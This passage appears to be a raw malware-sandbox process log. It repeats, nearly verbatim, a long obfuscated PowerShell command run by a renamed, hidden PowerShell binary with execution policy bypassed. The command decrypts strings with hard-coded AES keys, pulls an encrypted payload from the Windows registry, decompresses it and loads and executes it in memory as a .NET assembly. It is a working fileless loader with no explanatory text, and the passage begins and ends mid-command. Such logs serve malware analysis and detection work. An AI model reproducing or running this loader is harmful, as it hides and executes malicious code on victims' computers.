$DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        35⤵
        
        PID:6224
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7840).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        35⤵
        
        PID:8160
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7840).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        35⤵
        
        PID:9032
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7840).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        35⤵
        
        PID:10152
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7840).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = 